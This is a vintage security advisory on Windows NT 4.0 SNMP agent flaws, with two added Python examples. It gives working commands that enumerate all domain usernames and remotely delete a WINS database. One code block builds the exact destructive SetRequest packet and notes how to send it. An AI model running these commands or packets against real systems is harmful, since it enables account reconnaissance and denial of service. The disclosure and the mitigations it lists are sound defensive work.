COMMAND

    SNMP agent

SYSTEMS AFFECTED

    Win NT 4.0

PROBLEM

    Christopher J. Rouland posted the following.  He has found two
    significant "features" in the SNMP agent implementations under NT
    4.0 Server, and there may be more if you like digging.  Let's
    start.

    1. This first exploit demonstrates the ability via SNMP to dump  a
       list of all usernames in an NT domain (assuming the target  box
       is a DC) or on an NT Server.

       Here is the simplest NT example Chris could find to use this:

        C:\NTRESKIT>snmputil walk <hostname> public .1.3.6.1.4.1.77.1.2.25

       <hostname> should  be a  domain controller  or server.   Sample
       output would be:

       Variable =
       .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.71.117.101.115.116
       Value    = OCTET STRING - Guest

       Variable =
       .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.49
       Value    = OCTET STRING - test1

       Variable =
       .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.50
       Value    = OCTET STRING - test2

       Variable =
       .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.51
       Value    = OCTET STRING - test3

       Variable =
       .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.52
       Value    = OCTET STRING - test4

       Variable =
       .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.53
       Value    = OCTET STRING - test5

       Variable =
       .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.54
       Value    = OCTET STRING - test6

       Variable =
       .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.55
       Value    = OCTET STRING - test7

       Variable =
       .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.56
       Value    = OCTET STRING - test8

       Variable =
       .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.116.101.115.116.57
       Value    = OCTET STRING - test9

       Variable =
       .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.6.116.101.115.116.49.48
       Value    = OCTET STRING - test10

       Variable =
       .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.8.116.101.115.116.117.115.101.114
       Value    = OCTET STRING - testuser

       Variable =
       .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.13.65.100.109.105.110.105.115.116.114.97.116.111.114
       Value    = OCTET STRING - Administrator

       Variable =
       .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.13.73.85.83.82.95.82.78.74.68.69.86.48.49
       Value    = OCTET STRING - IUSR_NT4SRVDEV1

       Variable =
       .iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.19.83.81.76.69.120.101.99.117.116.105.118.101.67.109.100.69.120.101.99
       Value    = OCTET STRING - SQLExecutiveCmdExec

    2. The second exploit demonstrates the ability via SNMP to  delete
       all of the records in  a WINS database remotely, bypassing  all
       NT security.  If you understand large scale WINS  architecture,
       you can understand the implications of this.  Knowledge of SNMP
       community strings would allow  an attacker to effectively  shut
       down any large NT infrastructure with "N" commands (N=number of
       WINS servers).   This is permitted  due to the  extensive "cmd"
       set implemented in the WINS extension agent, specifically:

       cmdDeleteWins OBJECT-TYPE
                     SYNTAX  IpAddress
                     ACCESS  read-write
                     STATUS  mandatory
                     DESCRIPTION
                    "This variable when set will cause all information
                     pertaining  to  a  WINS  (data  records,  context
                     information to  be deleted  from the  local WINS.
                     Use this  only when  owner-address mapping  table
                     is getting to near capacity.  NOTE:  deletion  of
                     all information  pertaining to  the managed  WINS
                     is not permitted"
       ::= { cmd 3 }

       Since the SNMP toolset implemented under NT will not do
       snmp-set-requests, the sample exploit was done using the CMU SNMP
       development kit under Unix (check the UCD ftp site).  The command:

       rnjdev02:~/cmu$ snmpset -v 1 192.178.16.2 public .1.3.6.1.4.1.311.1.2.5.3.0 a 192.178.16.2

       successfully deleted my entire WINS database.

    3. It appears  that there are  several other pieces  of the LMMIB2
       definition  that  allow  for  things  such  as  remote  session
       deletion or disconnect, etc.
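
    Decoding what the walk in item 1 returns, as an added example that is
    not part of the original post: every row of svUserTable is indexed by
    the account name itself (a length sub-identifier followed by one
    sub-identifier per character), so each name shows up twice, once in
    the OID and once in the value.  The Python below parses a `snmputil
    walk` transcript, re-joins OIDs that the tool wrapped over several
    lines, decodes the index, and also accepts the numeric OID form
    (1.3.6.1.4.1.77.1.2.25.1.1.<len>.<bytes>) that other SNMP tools
    print.  The transcript it runs on is constructed from two of the
    rows shown above.

```python
"""Decode svUserName rows from an SNMP walk of the LanManager MIB.

Added example, not code from the original post.  SAMPLE_WALK is a
constructed transcript made from two rows of the output shown above.
"""
import re
from typing import List, Optional, Tuple

# Symbolic tail printed by snmputil, and the numeric prefix of the same
# column (lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName).
SVUSERNAME_TAIL = "svUserTable.svUserEntry.svUserName."
SVUSERNAME_NUMERIC = "1.3.6.1.4.1.77.1.2.25.1.1."
VALUE_RE = re.compile(r"^Value\s*=\s*OCTET STRING\s*-\s*(.*)$")

SAMPLE_WALK = """\
Variable =
.iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svUserTable.svUserEntry.svUserName.5.71.117.101.115.116
Value    = OCTET STRING - Guest

Variable =
.iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
serTable.svUserEntry.svUserName.13.65.100.109.105.110.105.115.116.114.97
.116.111.114
Value    = OCTET STRING - Administrator
"""


def decode_index(index: str) -> str:
    """Turn a table index such as '5.71.117.101.115.116' into 'Guest'.

    The first sub-identifier is the string length, the rest are the
    bytes of the name, so the row's OID leaks the account name before
    the value is even read.
    """
    parts = [int(p) for p in index.split(".")]
    length, codes = parts[0], parts[1:]
    if length != len(codes):
        raise ValueError(f"index length {length} does not match {len(codes)} sub-ids")
    return bytes(codes).decode("latin-1")


def index_of(oid: str) -> Optional[str]:
    """Return the svUserName index part of an OID (symbolic or numeric), or None."""
    for marker in (SVUSERNAME_TAIL, SVUSERNAME_NUMERIC):
        if marker in oid:
            return oid.split(marker, 1)[1]
    return None   # the walk has left the svUserName column


def parse_walk(transcript: str) -> List[Tuple[str, str]]:
    """Return (name_from_oid, value) pairs for every svUserName row.

    Everything between 'Variable =' and the 'Value' line is concatenated,
    which undoes the line wrapping snmputil applies to long OIDs.
    """
    rows: List[Tuple[str, str]] = []
    oid, collecting = "", False
    for line in transcript.splitlines():
        line = line.strip()
        if line.startswith("Variable"):
            oid, collecting = line.split("=", 1)[1].strip(), True
            continue
        m = VALUE_RE.match(line)
        if m and collecting:
            index = index_of(oid)
            if index is not None:
                rows.append((decode_index(index), m.group(1)))
            collecting = False
            continue
        if collecting:
            oid += line
    return rows


def inconsistent_rows(rows: List[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """Rows whose OID-encoded name differs from the returned value."""
    return [(i, v) for i, v in rows if i != v]


if __name__ == "__main__":
    for name, value in parse_walk(SAMPLE_WALK):
        print(f"OID index -> {name:<16} value -> {value}")
```

    Run against a real transcript (`snmputil walk <host> public
    .1.3.6.1.4.1.77.1.2.25 > walk.txt`) the parser gives the full account
    list; the consistency check is there because the two copies of the
    name come from different code paths in the agent and are worth
    comparing when you cannot be sure what the tool printed.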

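    What actually travels on the wire for the two commands in items 1 and
    2, as an added example that is not part of the original advisory: a
    small BER encoder for SNMPv1 (no external library) that builds the
    GetNextRequest with which a walk of svUserTable starts and the
    SetRequest that the `snmpset` line sends to cmdDeleteWins, plus a
    reader that pulls the community string back out of the datagram.
    Nothing is transmitted.  The point is that the only credential in
    either packet is the community string, carried in cleartext, which
    is why a sniffed or guessed "public" is enough to wipe a WINS server.

```python
"""SNMPv1 datagrams for the svUserName walk and the cmdDeleteWins set.

Added example, not code from the original advisory.  The OIDs are the
ones used in the advisory; the request ids and the 192.178.16.2 address
are taken from its sample command.
"""
import socket

GETNEXT_REQUEST, SET_REQUEST = 0xA1, 0xA3      # SNMPv1 PDU tags
NULL = b"\x05\x00"                             # ASN.1 NULL placeholder value
SV_USER_TABLE = "1.3.6.1.4.1.77.1.2.25"        # lanmgr-2.server.svUserTable
CMD_DELETE_WINS = "1.3.6.1.4.1.311.1.2.5.3.0"  # microsoft wins cmd.cmdDeleteWins.0


def ber_len(n: int) -> bytes:
    """Definite-form BER length: short form below 128, long form above."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag: int, body: bytes) -> bytes:
    return bytes([tag]) + ber_len(len(body)) + body


def ber_int(v: int) -> bytes:
    """Non-negative INTEGER; a leading 0x00 keeps values >= 128 positive."""
    return tlv(0x02, v.to_bytes(v.bit_length() // 8 + 1, "big"))


def ber_oid(dotted: str) -> bytes:
    """OBJECT IDENTIFIER: first two arcs packed as 40*x+y, the rest base-128."""
    arcs = [int(a) for a in dotted.strip(".").split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = bytearray([arc & 0x7F])
        arc >>= 7
        while arc:
            chunk.insert(0, 0x80 | (arc & 0x7F))
            arc >>= 7
        out += chunk
    return tlv(0x06, bytes(out))


def ip_address(dotted: str) -> bytes:
    """SNMP IpAddress: APPLICATION 0 (tag 0x40), four raw octets."""
    return tlv(0x40, socket.inet_aton(dotted))


def snmpv1_message(community: str, pdu_tag: int, request_id: int, varbinds) -> bytes:
    """SEQUENCE { version 0, community, PDU { req-id, 0, 0, varbind list } }."""
    vbl = b"".join(tlv(0x30, ber_oid(oid) + value) for oid, value in varbinds)
    pdu = tlv(pdu_tag, ber_int(request_id) + ber_int(0) + ber_int(0) + tlv(0x30, vbl))
    return tlv(0x30, ber_int(0) + tlv(0x04, community.encode("ascii")) + pdu)


def getnext_svusertable(community: str = "public", request_id: int = 1) -> bytes:
    """First request of `snmputil walk <host> public .1.3.6.1.4.1.77.1.2.25`."""
    return snmpv1_message(community, GETNEXT_REQUEST, request_id, [(SV_USER_TABLE, NULL)])


def set_cmd_delete_wins(wins_ip: str, community: str = "public", request_id: int = 2) -> bytes:
    """Equivalent of `snmpset -v 1 <host> public .1.3.6.1.4.1.311.1.2.5.3.0 a <wins_ip>`."""
    return snmpv1_message(community, SET_REQUEST, request_id,
                          [(CMD_DELETE_WINS, ip_address(wins_ip))])


def peek_community(datagram: bytes) -> str:
    """Read the community string straight out of a captured SNMPv1 datagram.

    Handles the short length form only (messages under 128 bytes), which
    covers everything built here.  A sniffer between manager and agent
    gets exactly this.
    """
    assert datagram[0] == 0x30 and datagram[1] < 0x80
    i = 2
    assert datagram[i] == 0x02                 # version INTEGER
    i += 2 + datagram[i + 1]
    assert datagram[i] == 0x04                 # community OCTET STRING
    n = datagram[i + 1]
    return datagram[i + 2:i + 2 + n].decode("ascii")


if __name__ == "__main__":
    pkt = set_cmd_delete_wins("192.178.16.2")
    print("SetRequest to cmdDeleteWins:", pkt.hex())
    print("community visible on the wire:", peek_community(pkt))
    # Delivering it is one UDP datagram to port 161 of the WINS server, e.g.
    # socket.socket(socket.AF_INET, socket.SOCK_DGRAM).sendto(pkt, ("192.178.16.2", 161))
```

    The SetRequest is 48 bytes; there is no sequence number worth
    guessing, no signature and no timestamp, so anything that can reach
    UDP/161 with the right community string can replay or forge it.
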
SOLUTION

    The simplest fix is to disable SNMP, or to remove the extension
    agents through the SNMP configuration in the registry.  If the
    service has to stay, change the default "public" community string
    and, in the Security tab of the SNMP service properties, accept
    packets only from the addresses of your management stations; also
    block UDP port 161 at the network border.  Remember that an SNMPv1
    community string is sent in cleartext in every datagram, so anyone
    who can sniff the manager's traffic learns it.  Since this problem
    has been discussed in Phrack 50, you may want to check what's
    written there (I don't remember NT being mentioned there; anyway,
    the problem is in SNMP).  Also consider moving to another version
    of SNMP (the examples here are SNMPv1).